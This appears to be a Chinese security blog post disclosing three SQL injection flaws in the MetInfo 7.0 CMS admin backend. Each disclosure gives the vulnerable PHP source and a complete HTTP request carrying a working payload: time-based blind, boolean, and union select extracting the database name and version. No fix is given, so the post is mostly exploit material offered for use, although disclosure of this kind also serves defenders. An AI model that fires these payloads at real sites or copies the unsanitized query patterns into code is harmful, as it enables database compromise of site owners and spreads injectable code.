详情

1
后台的注入还是有一些的,挑了三个混了一波cve,结果没注意还跟狗贼@y4er重复了一个,没啥技术含量,直接贴payload吧。

Vulnerability Name: Metinfo7.0 CMS Background SQL Blind Injection

Product Homepage: https://www.metinfo.cn/

Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta

Version: V7.0.0

payload

1
2
3
4
5
6
7
8
GET /metinfo7/admin/?n=user&c=admin_user&a=doGetUserInfo&id=1+and+sleep(3)%23 HTTP/1.1
Host: mywebsite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: Hm_lvt_520556228c0113270c0c772027905838=1570244770,1570424872,1570503403,1570547088; Hm_lpvt_520556228c0113270c0c772027905838=1570547412; re_url=http%3A%2F%2Fmywebsite.com%2Fmetinfo7%2Fadmin%2F; PHPSESSID=fb5aee71803d8bd8a4d749f5f6fdab81; met_auth=ce3ee5hyiTK2EFsp%2FtldPIqwx3UpgxxO3qTSHlskTNf%2B3McCzit1RW7K%2BT1uMCYiSH5zkgkFKWdz1rDiQ%2BR4uZH8OA; met_key=1MyOmLA; admin_lang=cn; page_iframe_url=http://mywebsite.com/metinfo7/index.php?lang=cn&pageset=1
Upgrade-Insecure-Requests: 1

Vulnerability code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
// app/system/user/admin/admin_user.class.php
line 97-114
    public function doGetUserInfo()
    {
        global $_M;

        $id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
        if (!$id) {
            $this->error();
        }
        $user = $this->userclass->get_user_by_id($id);
        unset($user['password']);
        $para_list = load::sys_class('para', 'new')->get_para_list(10);
        foreach ($para_list as $key => $para) {
            $query = "SELECT info FROM {$_M['table']['user_list']} WHERE listid = {$id} AND paraid={$para['id']} AND lang = '{$_M['lang']}'";
//            echo $query;
            $user_info = DB::get_one($query);
            $values = $user_info['info'];
            $para_list[$key]['value'] = $values;
        }

$id Incoming by user, and Unfiltered.

GET payload: /admin/?n=user&c=admin_user&a=doGetUserInfo&id=1+and+sleep(5)%23


Vulnerability Name: Metinfo CMS Background SQL Blind Injection

Product Homepage: https://www.metinfo.cn/

Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta

Version: V7.0.0

Vulnerability code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
// /app/system/language/admin/language_general.class.php

line 74-126

    public function doExportPack()
    {
        global $_M;

        if (!isset($_M['form']['editor']) || !$_M['form']['editor']) {
            $this->error($_M['word']['js41']);
        }

        $editor = $_M['form']['editor'];
        $site = isset($_M['form']['site']) ? $_M['form']['site'] : '';
        $appno = $_M['form']['appno'] ? $_M['form']['appno'] : '';
        $filename = PATH_WEB . 'cache/language_' . $site . '_' . $editor . '.ini';

        delfile($filename);

        //获取后台语言包
        $this->doget_admin_pack($appno,$site,$editor);

        $filename = realpath($filename);
        echo $filename;
        header("");
        Header("Content-type:  application/octet-stream ");
        Header("Accept-Ranges:  bytes ");
        Header("Accept-Length: " . filesize($filename));
        header("Content-Disposition:  attachment;  filename=language_{$site}_" . $appno .'_'. $editor . ".ini");
        //写日志
        $log_name = $_M['form']['site'] ? 'langadmin' : 'langweb';
        logs::addAdminLog($log_name,'language_outputlang_v6','jsok','doExportPack');
        readfile($filename);
    }

    //获取后台语言包
    public function doget_admin_pack($appno,$site,$editor)
    {
        global $_M;
        $sql = $appno ? "AND app = {$appno}" : '';
        $language_data = array();
        if ($site == 'admin') {
            $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='1' {$sql}";
            echo $query."</br>";
            $language_data = DB::get_all($query);
            echo $language_data;
            $lang_pack_url = PATH_WEB . 'cache/language_admin_' . $editor . '.ini';
        } else if ($site == 'web') {
            $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='0' {$sql}";
            $language_data = DB::get_all($query);
            $lang_pack_url = PATH_WEB . 'cache/language_web_' . $editor . '.ini';
        }

        foreach ($language_data as $key => $val) {
            file_put_contents($lang_pack_url, $val['name'] . '=' . $val['value'] . PHP_EOL, FILE_APPEND);
        }
    }

doget_admin_pack function was called in doExportPack function, and the two variables of $appno and $site passed by the user were not filtered.

payload

1
2
3
4
5
6
7
8
GET /metinfo7/admin/?n=language&c=language_general&a=doExportPack&editor=a&appno=2+or+1=1%23&site=admin HTTP/1.1
Host: mywebsite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: Hm_lvt_520556228c0113270c0c772027905838=1570424872,1570503403,1570547088,1570588541; Hm_lpvt_520556228c0113270c0c772027905838=1570588857; re_url=http%3A%2F%2Fmywebsite.com%2Fmetinfo7%2Fadmin%2F%3Fn%3Dfeedback%26c%3Dfeedback_admin%26a%3Ddosaveinc%26classnow%3Daa%2520and%2520sleep%283%29--%2B; PHPSESSID=fb5aee71803d8bd8a4d749f5f6fdab81; met_auth=02ceKLzEIIGFAV11vc8fTQikhAFyILEgJofRVZSPN3TvFdbsCYjZq1FrZ%2BCKtX5xCmdTlaTYn89do3UPGsVo%2BFAk0Q; met_key=CES31O8; admin_lang=cn; page_iframe_url=http://mywebsite.com/metinfo7/index.php?lang=cn&pageset=1; arrlanguage=metinfo
Upgrade-Insecure-Requests: 1

Vulnerability Name: Metinfo CMS Background SQL Union Select Injection

Product Homepage: https://www.metinfo.cn/

Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta

Version: V7.0.0

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
    // /app/system/language/admin/language_general.class.php
	//搜索语言参数
    public function doSearchParameter()
    {
        global $_M;
        if (!isset($_M['form']['word']) || !isset($_M['form']['site']) || !isset($_M['form']['editor'])) {
            $this->error('empty');
        }

        $site = $_M['form']['site'] == 'admin' ? 1 : 0;
        $no = $_M['form']['appno'] ? $_M['form']['appno'] : 0;
        $editor = $_M['form']['editor'];
        $word = $_M['form']['word'];

        $query = "SELECT name,value FROM {$_M['table']['language']} WHERE `value` like '%{$word}%' AND `app`={$no} AND `site`='{$site}' AND `lang`='{$editor}'";
        $language_data = DB::get_all($query);

        $this->success($language_data);
    }

$no =$_M[‘form’][‘appno’] Incoming by user, and Unfiltered. And success function return the information.

payload

1
2
3
4
5
6
7
8
GET /metinfo7/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=&appno=0+union+select+database(),version()--+&site=admin HTTP/1.1
Host: mywebsite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: Hm_lvt_520556228c0113270c0c772027905838=1570424872,1570503403,1570547088,1570588541; Hm_lpvt_520556228c0113270c0c772027905838=1570588857; re_url=http%3A%2F%2Fmywebsite.com%2Fmetinfo7%2Fadmin%2F%3Fn%3Dfeedback%26c%3Dfeedback_admin%26a%3Ddosaveinc%26classnow%3Daa%2520and%2520sleep%283%29--%2B; PHPSESSID=fb5aee71803d8bd8a4d749f5f6fdab81; met_auth=02ceKLzEIIGFAV11vc8fTQikhAFyILEgJofRVZSPN3TvFdbsCYjZq1FrZ%2BCKtX5xCmdTlaTYn89do3UPGsVo%2BFAk0Q; met_key=CES31O8; admin_lang=cn; page_iframe_url=http://mywebsite.com/metinfo7/index.php?lang=cn&pageset=1; arrlanguage=metinfo
Upgrade-Insecure-Requests: 1